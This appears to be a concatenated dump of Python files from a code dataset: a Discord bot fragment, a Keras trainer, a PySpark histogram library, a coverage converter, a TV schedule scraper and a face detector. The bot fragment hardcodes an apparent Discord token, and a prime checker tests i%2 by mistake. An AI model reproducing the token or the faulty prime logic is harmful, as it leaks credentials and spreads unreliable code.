ctx.send(file=discord.File('C:\\disbot\\Vedlve0.jpg'))#傳圖片\r\n\r\n\r\nclient.run('NTc2NzY4NzMzNzU0ODE4NTcw.XRUBMA.C0ockwxUlZbRQj8z2oI562nzp5c')","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326315120","text":"print(\"Importing librairies...\")\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\n\nfrom utilities import loaders\nfrom utilities import feature_extractors\nfrom utilities import tools\nfrom mixupgenerator.mixup_generator import MixupGenerator\nimport neural_networks\n\nprint(\"Done.\")\n\ntest_size = 0.20\nbatch_size = 50\nepochs = 5000\nalpha = 0.4\n\ni = 0\n\nprint(\"Loading dataset\")\n\nextractor = feature_extractors.raveller\nindices_generator, le = loaders.load_for_train_groups(test_size, extractor)\n\nprint(\"Done.\")\n\nkaggle_classification = int(input(\"Classification for Kaggle ? (1 or 0) : \"))\n\nif not kaggle_classification :\n print(\"\\n ▁▃▅▇ SPLIT {} ▇▅▃▁ \\n\".format(i))\n i += 1\n\n print(\"▶ Loading training data & preprocessing ◀\")\n X_train, y_train, X_test, y_test, lb = loaders.load_for_train_keras(test_size, extractor)\n\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n \n X_train = X_train.reshape((len(X_train), 1, 10, 128))\n X_test = X_test.reshape((len(X_test), 1, 10, 128))\n training_generator = MixupGenerator(X_train, y_train, batch_size=batch_size, alpha=alpha)()\n \n print(\"▶ Building the neural network ◀\")\n input_size = 1*128*10\n output_size = 9\n #classifier = neural_networks.basic(input_size, output_size)\n classifier = neural_networks.convolutional_VGGinspired(input_size, output_size)\n\n print(\"▶ Training ◀\")\n #classifier.fit(X_train, y_train, batch_size=batch_size, epochs=epochs)\n classifier.fit_generator(generator=training_generator, steps_per_epoch=X_train.shape[0] // batch_size, validation_data=(X_test, y_test), epochs=epochs, verbose=1)\n\n print(\"▶ Evaluating ◀\")\n y_pred = lb.inverse_transform(tools.max_one_hot(classifier.predict(X_test)), 0.5)\n y_test = lb.inverse_transform(y_test, 0.5)\n tools.accuracy_test(y_test, y_pred)\n tools.conf_matrix(y_test, y_pred)\nelse :\n print(\"▶ Loading training data & preprocessing ◀\")\n X, y, X_kaggle, lb = loaders.load_for_kaggle_keras(extractor)\n sc = StandardScaler()\n X = sc.fit_transform(X)\n X_kaggle = sc.transform(X_kaggle)\n \n X = X.reshape((len(X), 1, 10, 128))\n X_kaggle = X_kaggle.reshape((len(X_kaggle), 1, 10, 128))\n training_generator = MixupGenerator(X, y, batch_size=batch_size, alpha=alpha)()\n \n print(\"▶ Building the neural network ◀\")\n classifier = neural_networks.convolutional2D(1280, 9)\n\n print(\"▶ Training ◀\")\n classifier.fit_generator(generator=training_generator, steps_per_epoch=X.shape[0] // batch_size, epochs=epochs, verbose=1)\n\t\n print(\"▶ Evaluating Kaggle Data ◀\")\n y_pred = lb.inverse_transform(tools.max_one_hot(classifier.predict(X_kaggle)), 0.5)\n \n print(\"▶ Generating submission file ◀\")\n tools.CSVOutput(y_pred)\n","sub_path":"neural_network/classification_keras_VGGinspired.py","file_name":"classification_keras_VGGinspired.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121069745","text":"def ChkPrime(lst):\n arr = []\n for i in lst:\n isPrime = True\n for no in range(2,i):\n if i%2==0:\n isPrime = False\n break\n\n if isPrime:\n arr.append(i)\n print(\"Prime no are\",arr)\n print(\"Sum is\",sum(arr))\n","sub_path":"A5.5.2.py","file_name":"A5.5.2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383741785","text":"from scipy.interpolate import interp1d\n\ntry:\n from pyspark.sql.types import NumericType\n\n import pyspark.sql.functions as F\nexcept:\n pass\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\n\n\ndef hist(axis, x, overlapping=False, formatted_yaxis=True, **kwargs):\n \"\"\"Plots a histogram on an Axis object\n\n Args:\n :axis: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot.\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :overlapping: (`bool`, optional)\n Generate overlapping histograms.\n\n If set to true, this will generate an overlapping plot.\n When set to False it will generate a normal grouped histogram. Defaults to False.\n :formatted_yaxis: (`bool`, optional)\n If set to true, the numbers on the yaxis will be formatted\n for better readability. E.g. 1500000 will become 1.5M. Defaults to True\n\n :\\*\\*kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist\n\n Returns:\n :n: (`array` or `list` of `arrays`)\n The values of the histogram bins. See normed and weights for a description of the possible semantics.\n If input x is an array, then this is an array of length nbins. If input is a sequence arrays\n [data1, data2,..], then this is a list of arrays with the values of the histograms for each of the\n arrays in the same order.\n :bins: (`array`)\n The edges of the bins.\n Length nbins + 1 (nbins left edges and right edge of last bin). Always a single array even\n when multiple data sets are passed in.\n :patches: (`list` or `list` of `lists`)\n Silent list of individual patches used to create the histogram or list of such lists if multiple\n input datasets.\n\n \"\"\"\n histogram = create_histogram_object(kwargs)\n histogram.add_data(x)\n return histogram.plot_hist(axis, overlapping, formatted_yaxis, **kwargs)\n\n\ndef distplot(axis, x, **kwargs):\n \"\"\"Plots a normalised histogram and a density plot on an Axes object\n\n Args:\n :axis: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot.\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :\\*\\*kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist. Normed is set to True\n\n Returns:\n :n: (`array` or `list` of `arrays`)\n The values of the histogram bins. See normed and weights for a description of the possible semantics.\n If input x is an array, then this is an array of length nbins. If input is a sequence arrays\n [data1, data2,..], then this is a list of arrays with the values of the histograms for each of the\n arrays in the same order.\n :bins: (`array`)\n The edges of the bins.\n Length nbins + 1 (nbins left edges and right edge of last bin). Always a single array even\n when multiple data sets are passed in.\n :patches: (`list` or `list` of `lists`)\n Silent list of individual patches used to create the histogram or list of such lists if multiple\n input datasets.\n \"\"\"\n histogram = create_histogram_object(kwargs)\n histogram.add_data(x)\n n, bins, patches = histogram.plot_hist(axis, density=True, **kwargs)\n\n # If working with a list of DataFrames as input, patches will be a list of lists with Rectangle objects\n # We will get the color of the first Rectangle object. If there is only one DataFrame patches is a single list\n # Of Rectangle objects\n if type(x) == list and len(x) > 1:\n colors = [patch[0].get_facecolor() for patch in patches]\n elif type(patches[0]) is Rectangle:\n colors = [patches[0].get_facecolor()]\n else:\n raise TypeError(\"Unexpected Patch Type. Expected Rectangle\")\n\n histogram.plot_density(axis, color=colors)\n return n, bins, patches\n\n\ndef pandas_histogram(x, bins=10, range=None):\n \"\"\"Returns a pandas DataFrame with histograms of the Spark DataFrame\n\n Bin ranges are formatted as text an put on the Index.\n\n Args:\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :bins: (`integer` or `array_like`, optional)\n If an integer is given, bins + 1 bin edges are returned, consistently with numpy.histogram() for\n numpy version >= 1.3.\n\n Unequally spaced bins are supported if bins is a sequence.\n\n Default is 10\n :range: (tuple or None, optional)\n The lower and upper range of the bins. Lower and upper outliers are ignored.\n If not provided, range is (x.min(), x.max()). Range has no effect if bins is a sequence.\n\n If bins is a sequence or range is specified, autoscaling is based on the specified bin range instead\n of the range of x.\n\n Default is None\n \"\"\"\n histogram = Histogram(bins=bins, range=range)\n histogram.add_data(x)\n return histogram.to_pandas()\n\n\ndef create_histogram_object(kwargs):\n bins = 10\n b_range = None\n\n if 'bins' in kwargs:\n bins = kwargs['bins']\n del kwargs['bins']\n\n if 'range' in kwargs:\n b_range = kwargs['range']\n del kwargs['range']\n\n return Histogram(bins=bins, range=b_range)\n\n\nclass Histogram(object):\n \"\"\"The Histogram object leverages Spark to calculate histograms, and matplotlib to visualize these.\n\n Args:\n :range: (`tuple`, optional)\n The lower and upper range of the bins.\n\n Lower and upper outliers are ignored. If not provided, range is (min(x), max(x)). Range has no\n effect if bins is a sequence. If bins is a sequence or range is specified, autoscaling is\n based on the specified bin range instead of the range of x.\n :bins: (`int` or `list` of `str` or `list of `int`, optional)\n If an integer is given: Number of bins in the histogram.\n\n Defaults to 10.\n\n If a list is given: Predefined list of bin boundaries.\n\n The bins are all open to the right except for the last which is closed. e.g. [1,10,20,50] means\n the buckets are [1,10) [10,20) [20,50], which means 1<=x<10, 10<=x<20, 20<=x<=50.\n\n \"\"\"\n def __init__(self, bins=10, range=None):\n self.col_list = []\n self.bin_boundaries = []\n self.hist_dict = {} # column names: bin weight lists pairs\n self.nr_bins = None\n self.min_value = None\n self.max_value = None\n self.is_build = False\n\n if isinstance(bins, list):\n self.bin_boundaries = [float(bin_border) for bin_border in bins]\n else:\n self.nr_bins = bins\n\n if range is not None:\n self.min_value = range[0]\n self.max_value = range[1]\n\n def add_column(self, table):\n \"\"\"Add single column DataFrame to the histogram object.\n\n If multiple columns share the same name, a (n) will be appended to the name, where n is\n the next available number.\n\n Args:\n :table: (:obj:`dataframe`)\n A PySpark DataFrame with a single column\n\n \"\"\"\n if len(table.columns) > 1:\n raise ValueError('More then one column is being added, use add_data() to add multi-column DataFrames')\n\n column_name = table.columns[0]\n\n if not isinstance(table.schema.fields[0].dataType, NumericType):\n raise ValueError('Column %s has a non-numeric type (%s), only numeric types are supported'\n % (column_name, str(table.schema.fields[0].dataType)))\n\n self.col_list.append((table, column_name))\n\n def _get_bin_centers(self):\n result = []\n for i in range(len(self.bin_boundaries) - 1):\n result.append(((self.bin_boundaries[i + 1] - self.bin_boundaries[i]) / 2) + self.bin_boundaries[i])\n return result\n\n def _get_col_names(self):\n new_col_names = []\n for i in range(len(self.bin_boundaries) - 1):\n new_col_names.append('%.2f - %.2f' % (self.bin_boundaries[i], self.bin_boundaries[i + 1]))\n return new_col_names\n\n def _check_col_name(self, column_name):\n n = 0\n col_name_new = column_name\n while col_name_new in self.hist_dict.keys():\n n += 1\n col_name_new = '%s (%d)' % (column_name, n)\n return col_name_new\n\n def _get_min_value(self):\n if self.min_value is not None:\n return self.min_value\n return min([table.select(F.min(F.col(col_name))).collect()[0][0]\n for table, col_name in self.col_list])\n\n def _get_max_value(self):\n if self.max_value is not None:\n return self.max_value\n return max([table.select(F.max(F.col(col_name))).collect()[0][0]\n for table, col_name in self.col_list])\n\n def _calculate_bins(self):\n if len(self.bin_boundaries) > 0:\n return self.bin_boundaries\n\n if len(self.bin_boundaries) == 0 and len(self.col_list) == 1 \\\n and self.min_value is None and self.max_value is None:\n # Only use the amount of bins as input For the histogram function\n return self.nr_bins\n\n min_value = self._get_min_value()\n max_value = self._get_max_value()\n\n # expand empty range to avoid empty graph\n return Histogram._calc_n_bins_between(min_value, max_value, self.nr_bins)\n\n def _add_hist(self, table, column_name):\n \"\"\"Uses spark to calculate the hist values: for each column a list of weights, and if the bin_list is not set\n a set of bin boundaries\"\"\"\n bin_boundaries, bin_weights = table.select(column_name).rdd.flatMap(lambda x: x).histogram(self.bin_boundaries)\n self.hist_dict[self._check_col_name(column_name)] = bin_weights\n\n if isinstance(self.bin_boundaries, int): # the bin_list is not set\n if len(bin_boundaries) == 2 and bin_boundaries[0] == bin_boundaries[1]:\n # In case of a column with 1 unique value we need to calculate the histogram ourselves.\n min_value = bin_boundaries[0]\n max_value = bin_boundaries[1]\n self.bin_boundaries = self._calc_n_bins_between(min_value, max_value, self.nr_bins)\n self.hist_dict[column_name] = Histogram._calc_weights(self.bin_boundaries, min_value, bin_weights)\n else:\n self.bin_boundaries = bin_boundaries\n\n @staticmethod\n def _calc_n_bins_between(min_value, max_value, nr_bins):\n \"\"\"Returns a list of bin borders between min_value and max_value\"\"\"\n if min_value == max_value:\n min_value = min_value - 0.5\n max_value = max_value + 0.5\n step = (float(max_value) - float(min_value)) / nr_bins\n return [min_value + (step * float(bn_nr)) for bn_nr in range(nr_bins + 1)]\n\n @staticmethod\n def _calc_weights(bins, value, value_count):\n \"\"\"Calculate weights given a bin list, value within that bin list and a count\"\"\"\n # first we get a list of bin boundary tuples\n weights = list()\n bin_boundary_idx = [(idx, idx+2) for idx in range(len(bins)-1)]\n bin_boundaries = [tuple(bins[left_idx:right_idx]) for (left_idx, right_idx) in bin_boundary_idx]\n for left_boundary, right_boundary in bin_boundaries:\n if left_boundary <= value < right_boundary:\n weights.append(value_count[0])\n else:\n weights.append(0)\n return weights\n\n @staticmethod\n def _convert_number_bmk(axis_value, _):\n \"\"\"Converts the values on axes to Billions, Millions or Thousands\"\"\"\n if axis_value >= 1e9:\n return '{:1.1f}B'.format(axis_value * 1e-9)\n if axis_value >= 1e6:\n return '{:1.1f}M'.format(axis_value * 1e-6)\n if axis_value >= 1e3:\n return '{:1.1f}K'.format(axis_value * 1e-3)\n if axis_value >= 1 or axis_value == 0:\n return '{:1.0f}'.format(axis_value)\n return axis_value\n\n def build(self):\n \"\"\"Calculates the histogram values for each of the columns.\n\n If the Histogram has already been build, it doesn't build it again.\n \"\"\"\n if not self.is_build:\n self.bin_boundaries = self._calculate_bins()\n for table, column_name in self.col_list:\n self._add_hist(table, column_name)\n self.is_build = True\n\n def to_pandas(self, kind='hist'):\n \"\"\"Returns a pandas dataframe from the Histogram object.\n\n This function calculates the Histogram function in Spark if it was not done yet.\n\n Args:\n :kind: (:obj:`str`, optional):\n 'hist' or 'density'. When using hist this returns the histogram object\n as pandas dataframe. When using density the index contains the bin centers, and the values in the\n DataFrame are the scaled values. Defaults to 'hist'\n\n Returns:\n A pandas DataFrame from the Histogram object.\n \"\"\"\n self.build()\n if kind == 'hist':\n return pd.DataFrame(self.hist_dict).set_index([self._get_col_names()])\n elif kind == 'density':\n result = pd.DataFrame(self.hist_dict).set_index([self._get_bin_centers()])\n return result.apply(lambda x: x / x.max(), axis=0)\n\n def plot_hist(self, ax, overlapping=False, formatted_yaxis=True, **kwargs):\n \"\"\"Returns a matplotlib style histogram (matplotlib.pyplot.hist)\n\n Uses the matplotlib object oriented interface to add a Histogram to an matplotlib Axes object.\n All named arguments from pyplot.hist can be used. A new argument called \"type\" makes it possible to\n make overlapping histogram plots.\n\n Args:\n :ax: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot\n :overlapping (`bool`, optional):\n If set to true, this will generate an overlapping plot.\n When set to False it will generate a normal grouped histogram. Defaults to False.\n :formatted_yaxis: (`bool`, optional).\n If set to true, the numbers on the yaxis will be formatted\n for better readability. E.g. 1500000 will become 1.5M. Defaults to True\n :**kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist\n \"\"\"\n self.build()\n\n if formatted_yaxis:\n # Round the y-axis value to nearest thousand, million, or billion for readable y-axis\n formatter = plt.FuncFormatter(Histogram._convert_number_bmk)\n ax.yaxis.set_major_formatter(formatter)\n\n if overlapping:\n for colname in self.hist_dict:\n ax.hist(self._get_bin_centers(),\n bins=self.bin_boundaries,\n alpha=0.5,\n label=self.hist_dict.keys(),\n weights=self.hist_dict[colname],\n **kwargs\n )\n else:\n weights_multi = [self.hist_dict[colname] for colname in self.hist_dict]\n return ax.hist([self._get_bin_centers()] * len(self.hist_dict),\n bins=self.bin_boundaries,\n weights=weights_multi,\n label=self.hist_dict.keys(),\n **kwargs)\n \n def plot_density(self, ax, num=300, **kwargs):\n \"\"\"Returns a density plot on an Pyplot Axes object.\n\n Args:\n :ax: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot\n :num: (`int`)\n The number of x values the line is plotted on. Default: 300\n :**kwargs:\n Keyword arguments that are passed on to the pyplot.plot function.\n \"\"\"\n colors = []\n\n self.build()\n bin_centers = np.asarray(self._get_bin_centers())\n x_new = np.linspace(bin_centers.min(), bin_centers.max(), num)\n\n if 'color' in kwargs:\n colors = kwargs['color']\n del kwargs['color']\n\n power_smooth = []\n\n for (colname, bin_values) in self.hist_dict.items():\n normed_values, ble = np.histogram(self._get_bin_centers(),\n bins=self.bin_boundaries,\n weights=bin_values,\n density=True\n )\n interpolation_function = interp1d(bin_centers, normed_values, kind='quadratic')\n\n power_smooth.append(x_new)\n power_smooth.append(interpolation_function(x_new))\n\n lines = ax.plot(*power_smooth, **kwargs)\n\n for i, line in enumerate(lines):\n if len(colors) > 0:\n plt.setp(line, color=colors[i], label=list(self.hist_dict.keys())[i])\n else:\n plt.setp(line, label=list(self.hist_dict.keys())[i])\n\n return lines\n\n def add_data(self, data):\n \"\"\"Ads 1 or more columns to a histogram.\n\n Multiple options are available:\n * Add a single column dataframe\n * Add a list of single column dataframes\n * Add a dataframe with multiple columns\n\n Args:\n :data:\n A single column Spark dataframe, a list of single column Spark\n dataframes, or a multi column Spark dataframe.\n \"\"\"\n if isinstance(data, list):\n for df_column in data:\n self.add_column(df_column)\n\n elif len(data.columns) > 1:\n for col_name in data.columns:\n self.add_column(data.select(col_name))\n\n else:\n self.add_column(data)\n","sub_path":"pyspark_dist_explore/pyspark_dist_explore.py","file_name":"pyspark_dist_explore.py","file_ext":"py","file_size_in_byte":18280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203751956","text":"#! /usr/bin/env python\n\nimport os, sys, pickle\n\ndef longest_common_prefix(elements):\n if not elements:\n return \"\"\n prefix = elements[0]\n for e in elements:\n prefix = longest_common_prefix_2(prefix, e)\n return prefix\ndef longest_common_prefix_2(a, b):\n maxlen = min(len(a), len(b))\n for i in range(maxlen, 0, -1):\n if a[:i] == b[:i]:\n return a[:i]\n return \"\"\n\n## def write_el(r2):\n## filenames = sorted(r2.keys())\n## out = open(\".figleaf.el\", \"w\")\n## out.write(\"(setq figleaf-results '(\\n\")\n## for f in filenames:\n## linenumbers = r2[f]\n## out.write(' (\"%s\" (%s))\\n' % (f, \" \".join([str(ln)\n## for ln in linenumbers])))\n## out.write(\" ))\\n\")\n## out.close()\n\ndef write_el(r2, source):\n filenames = sorted(r2.keys())\n out = open(\".figleaf.el\", \"w\")\n out.write(\"\"\"\n;; This is an elisp-readable form of the figleaf coverage data. It defines a\n;; single top-level hash table in which the load-path-relative filename (like\n;; allmydata/download.py) is the key, and the value is a three-element list.\n;; The first element of this list is a list of line numbers that represent\n;; actual code. The second is a list of line numbers for lines which got used\n;; during the unit test. The third is a list of line numbers for code lines\n;; that were not covered (since 'code' and 'covered' start as sets, this last\n;; list is equal to 'code - covered').\n\n\"\"\")\n out.write(\"(let ((results (make-hash-table :test 'equal)))\\n\")\n for f in filenames:\n covered_linenumbers = r2[f]\n code_linenumbers = source[f]\n uncovered_code = code_linenumbers - covered_linenumbers\n out.write(\" (puthash \\\"%s\\\" '((%s) (%s) (%s)) results)\\n\"\n % (f,\n \" \".join([str(ln) for ln in sorted(code_linenumbers)]),\n \" \".join([str(ln) for ln in sorted(covered_linenumbers)]),\n \" \".join([str(ln) for ln in sorted(uncovered_code)]),\n ))\n out.write(\" results)\\n\")\n out.close()\n\nimport figleaf\n\ndef examine_source(filename):\n f = open(filename, \"r\")\n lines = figleaf.get_lines(f)\n f.close()\n return lines\n\ndef main():\n results = pickle.load(open(sys.argv[1], \"rb\"))\n import_prefix = os.path.abspath(sys.argv[2])\n if not import_prefix.endswith(\"/\"):\n import_prefix = import_prefix + \"/\"\n plen = len(import_prefix)\n\n r2 = {}\n source = {}\n filenames = sorted(results.keys())\n here = os.getcwd()\n for f in filenames:\n if f.startswith(import_prefix):\n short = f[plen:]\n r2[short] = results[f]\n source[short] = examine_source(f)\n write_el(r2, source)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"misc/testutils/figleaf2el.py","file_name":"figleaf2el.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594303174","text":"import glob\nimport re\nimport io\n\nimport pandas as pd\nfrom openpyxl.utils import get_column_letter\n\nstudio_regex = re.compile(r'(ST(UDIOUL|\\.)\\.?|CAR\\s|PANGRATTI)\\s?(([^HAND])(.*))', flags=re.IGNORECASE)\ntime_regex = re.compile(r'(^\\d.*\\d)\\s?([^0-9.\\-:]+)?')\nstudios = {}\n\nfile = ''\nsheet = ''\n\ntypes = ['B', 'E', 'CT']\n\nheaders = ['Nume', 'Luna', 'Ziua', 'Structura', 'Functie', 'Program', 'Perioada', 'Tip', 'Filename', 'Sheet', 'Cell']\nexport_df = pd.DataFrame(columns=headers)\n\n\nclass Position:\n def __init__(self, filename, sheet, row, column):\n self.column = column\n self.row = row\n self.sheet = sheet\n self.filename = filename\n self.cell = get_column_letter(self.column + 1) + str(self.row)\n\n def __str__(self):\n return f'{self.filename} - {self.sheet} - {self.cell}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Studio:\n def __init__(self, name, type, programs):\n self.programs = programs\n self.type = type\n self.name = name\n\n def __str__(self):\n return f'{self.name} - {self.type} - {self.programs}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Program:\n def __init__(self, name, activities, people, source):\n self.source = source\n self.people = people\n self.activities = activities\n self.name = name\n\n def __str__(self):\n return f'{self.name} - {self.people} - {self.activities} - {self.source}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Activity:\n def __init__(self, time, type):\n self.type = type\n self.time = time\n\n def __str__(self):\n return f'{self.time} - {self.type}'\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Raport:\n def __init__(self, person, job_type):\n self.job_type = job_type.title()\n self.person = person\n self.filename = ''\n\n def run(self):\n global export_df\n export_df = pd.DataFrame(columns=headers)\n self.parse_folder(self.person)\n sio = io.BytesIO()\n pandasWriter = pd.ExcelWriter(sio, engine='xlsxwriter')\n export_df.to_excel(pandasWriter, sheet_name='2018', index=False)\n pandasWriter.save()\n\n sio.seek(0)\n workbook = sio.read()\n\n return {'filename': self.filename, 'data': workbook}\n\n def export(self, first_name, last_name):\n global export_df\n full_name = f'{first_name} {last_name}'.title().strip()\n self.filename = f'Raport - {full_name}.xlsx'\n dfs = []\n\n for type in types:\n dfs.append(export_df[export_df['Tip'].str.contains(type)])\n export_df = pd.concat(dfs)\n export_df.sort_values(['Ziua', 'Perioada'], ascending=True, inplace=True)\n export_df.reset_index(inplace=True, drop=True)\n export_df['Nume'][0] = full_name\n\n # export_df.to_excel(f'website/utils/raports/{self.filename}', '2018', index=False)\n # export_df.to_excel(f'\\\\\\\\192.168.0.178\\\\homes\\\\Vali\\\\Raport - {full_name}.xlsx', '2018', index=False)\n print(f'Created raport for {full_name}')\n\n def parse_folder(self, first_name, last_name=''):\n files = glob.glob('website/utils/programs/*.xls')\n for file in files:\n self.parse_file(file, first_name, last_name)\n\n self.export(first_name, last_name)\n\n def parse_file(self, filename, first_name, last_name):\n global file, sheet\n file = filename\n sheets = pd.read_excel(filename, sheet_name=None)\n sheet_names = list(sheets.keys())[1:]\n for sheet_name in sheet_names:\n sheet = sheet_name\n df = sheets[sheet_name]\n self.parse_sheet(df, first_name, last_name)\n\n def parse_sheet(self, df, first_name, last_name):\n global export_df\n\n get_studio_list(df)\n get_program_list(df)\n first_name = first_name.lower()\n last_name = last_name.lower()\n first_name_initial = first_name[0]\n date = re.match(r'(\\w+)\\s*(\\d+).(\\d+).(\\d+)', df.columns[0])\n year = date.group(4)\n if year != '2018':\n year = '2018'\n month = date.group(3)\n day = date.group(2)\n day_name = date.group(1)\n date = f'{year}.{month}.{day} ({day_name.capitalize()})'\n month_names = {1: 'Ianuarie', 2: 'Februarie', 3: 'Martie', 4: 'Aprilie', 5: 'Mai', 6: 'Iunie', 7: 'Iulie', 8: 'August', 9: 'Septembrie', 10: 'Octombrie', 11: 'Noiembrie', 12: 'Decembrie'}\n\n possible_names = [first_name]\n if last_name:\n last_name_initial = last_name[0]\n possible_names.append([last_name + ' ' + first_name, last_name + ' ' + first_name_initial, first_name + ' ' + last_name, first_name + ' ' + last_name_initial])\n\n for key, studio in studios.items():\n studio_name = f'{studio.type.capitalize()} {studio.name.capitalize()}'\n for program in studio.programs:\n if any(name in program.people for name in possible_names):\n for activity in program.activities:\n export_df = export_df.append({'Luna': month_names[int(month)], 'Ziua': date, 'Structura': studio_name, 'Functie': self.job_type, 'Program': program.name.title(), 'Perioada': activity.time, 'Tip': activity.type, 'Filename': program.source.filename, 'Sheet': program.source.sheet, 'Cell': program.source.cell}, ignore_index=True)\n\n\ndef is_studio(string):\n match = re.match(studio_regex, str(string))\n return match\n\n\ndef get_studio_list(df):\n global studios\n studios = {}\n for column in range(len(df.columns)):\n for cell in df[df.columns[column]]:\n match = is_studio(cell)\n cell = str(cell).lower()\n if match or cell == 'pangratti':\n studio_type = ''\n\n if cell == 'pangratti':\n name = 'Pangratti'\n studio_type = 'studio'\n else:\n name = match.group(3)\n\n if 'st' in cell:\n studio_type = 'studio'\n elif 'car' in cell:\n studio_type = 'car'\n elif 'pangratti' not in cell:\n studio_type = 'unknown'\n\n studios[name] = Studio(name, studio_type, [])\n studios['Unknown'] = Studio('Unknown', 'Unknown', [])\n\n\ndef get_next_filled_cell(df, row, column, direction=1, regex=r''):\n row += direction\n while (pd.isnull(df[df.columns[column]][row]) or (regex != r'' and not re.match(regex, df[df.columns[column]][row]))) and len(df) - 1 > row > 0:\n row += direction\n return row, column, df[df.columns[column]][row]\n\n\ndef get_program(df, time_row, column):\n if time_row == len(df) - 1:\n return len(df)\n activities = []\n names = []\n title = get_next_filled_cell(df, time_row, column, -1)\n title_name = title[2]\n studio = get_next_filled_cell(df, time_row, column, -1, studio_regex)\n times_range = (time_row, get_regex_until_ne(df, time_row, column, 1, time_regex))\n try:\n studio_name = is_studio(studio[2]).group(3) if is_studio(studio[2]).group(3) else studio[2]\n except:\n if studio[2] == 'PANGRATTI':\n studio_name = 'Pangratti'\n else:\n studio_name = 'Unknown'\n names_range = [times_range[1] + 1, get_regex_until_ne(df, times_range[1] + 1, column, 1, r'^\\D+')]\n\n # if get_next_filled_cell(df, time_row, column, 1, studio_regex)[0] != len(df) - 1:\n # names_range[1] = get_next_filled_cell(df, time_row, column, 1, studio_regex)[0] - 1\n # else:\n # names_range[1] = get_next_filled_cell(df, time_row, column, -1)[0] - 1\n\n for row in range(times_range[0], times_range[1] + 1):\n if str(get_cell(df, row, column)) == 'nan':\n continue\n match = re.match(time_regex, get_cell(df, row, column))\n if match:\n time = match.group(1)\n type = match.group(2) if match.group(2) else 'B'\n activities.append(Activity(time, type))\n\n for row in range(names_range[0], names_range[1] + 1):\n cell = str(get_cell(df, row, column))\n if cell != 'nan' and not any(x in cell for x in ['ORE', 'INTIRZ', 'PROSP', 'FILM', 'NOAPTE', 'ATENTIE', 'TINUTA', 'LEGIT', 'BULETIN', 'PROGRAM', 'PLECARE', 'PULSUL', 'HANDBAL', 'VREMEA', 'PRIETEN', 'TURA', 'JURNAL', '\\\\']):\n name = re.match(r'^[a-zA-Z\\s]+', get_cell(df, row, column).lower()).group(0).strip()\n names.append(name)\n # if name not in persons:\n # persons.append(name)\n studios[studio_name].programs.append(Program(title_name if studios[studio_name].name != '11' else 'Stiri', activities, names, Position(file[9:], sheet, title[0] + 2, column)))\n\n return times_range[1] + 1\n\n\ndef get_program_list(df):\n for column in range(len(df.columns)):\n row = 0\n prev_row = -1\n while prev_row != row and row < len(df) - 1:\n prev_row = row\n row = get_program(df, get_next_filled_cell(df, row, column, 1, time_regex)[0], column)\n\n\ndef get_cell(df, row, column):\n return df[df.columns[column]][row]\n\n\ndef get_regex_until_ne(df, row, column, direction, regex_to_find):\n while get_next_filled_cell(df, row, column, direction, regex_to_find)[0] < len(df) - 1:\n if not re.match(regex_to_find, get_next_filled_cell(df, row, column, direction)[2]):\n return row\n row = get_next_filled_cell(df, row, column, direction, regex_to_find)[0]\n return row\n","sub_path":"website/utils/tvr_program_scraper.py","file_name":"tvr_program_scraper.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"111258571","text":"import cv2 # Open source computer vision library for computer vision tasks\nimport os # For interacting with the operating system\n\n# Pre-trained cascade classifier for face detection\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ndef detect_faces(img, draw_box=True):\n\t# Convert image to grayscale\n\tgrayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\t# Detect faces\n\tfaces = face_cascade.detectMultiScale(grayscale_img, scaleFactor=1.1, # Reduce the size by 5%\n\t\tminNeighbors=5, # Higher value results in fewer detections but with higher quality\n minSize=(30, 30), # How small size we want to detect\n flags=cv2.CASCADE_SCALE_IMAGE) # For an old cascade classifier\n # 0 for new format for cascade classifier \n\t\n\tface_box, face_coords = None, []\n # Draw bounding box around detected faces\n\tfor (x, y, w, h) in faces:\n\t\tif draw_box:\n\t\t\tcv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5) # Img, Start, Color and Thickness\n\t\tface_box = img[y:y+h, x:x+w] # Crop image\n\t\tface_coords = [x,y,w,h] # Starting and ending x and Y Coordinates of face\n\n\treturn img, face_box, face_coords \n","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277492358","text":"#!/usr/bin/env pyhton\n# -*- coding: UTF-8 -*-\n\n\n__author__ = 'Chao Wu'\n__date__ = '09/08/2020'\n__version__ = '1.2'\n\n\nr'''\nThis script estimates 